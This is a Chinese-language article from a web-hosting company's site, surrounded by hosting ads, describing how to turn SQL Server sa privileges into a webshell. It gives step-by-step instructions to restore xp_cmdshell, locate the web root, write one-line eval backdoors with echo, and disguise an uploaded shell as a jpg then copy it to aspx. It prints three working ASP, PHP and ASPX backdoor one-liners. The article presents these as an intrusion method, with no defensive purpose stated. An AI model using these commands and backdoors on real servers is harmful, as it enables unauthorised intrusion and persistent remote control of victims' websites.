sa权限获取webshell思路-创新互联

sa权限获取webshell思路

创新互联从2013年创立，是专业互联网技术服务公司，拥有项目做网站、网站建设网站策划，项目实施与项目整合能力。我们以让每一个梦想脱颖而出为使命，1280元环县做网站,已为上家服务,为环县各地企业和个人服务,联系电话:13518219792

  1.通过SQL查询分析器通过sa权限首先恢复xp_cmdshell存储过程。

  2.通过SQL Tools2.0连接数据库，执行命令，查看网站路径以及磁盘文件，获取网站的真实路径。

  3.echo生成一句话后门。

  4.直接获取webshell权限。

  5.如果echo生成的一句话后门无法执行，可以通过查看对应网站的数据库，获取后台登陆密码，通过后台上传webshell的jpg。然后通过copy命令将jgp文件复制为aspx文件，从而获取webshell。

技巧：

  1.寻找可写的文件夹，例如c:/windows/temp，以及网站的真实路劲。

  2.通过echo命令生成一句话后门

  echo ^<%eval request(cmd)% ^>^>d:\wwwroot\ok.asp

  echo ^<?php @eval($_POST[cmd]);?^>^>cmd.php

  echo ^<%@ PageLanguage="Jscript%"^>^<^%eval(Request.Item["pass"],"unsafe");%^>^>c:\inetpub\wwwroot\cmd.aspx

另外有需要云服务器可以了解下创新互联scvps.cn，海内外云服务器15元起步，三天无理由+7*72小时售后在线，公司持有idc许可证，提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案，具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势，专为企业上云打造定制，能够满足用户丰富、多元化的应用场景需求。

网页名称：sa权限获取webshell思路-创新互联
文章地址：https://www.cdcxhl.com/article28/hdhjp.html

成都网站建设公司_创新互联，为您提供虚拟主机、网站维护、网站收录、标签优化、自适应网站、网站策划

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联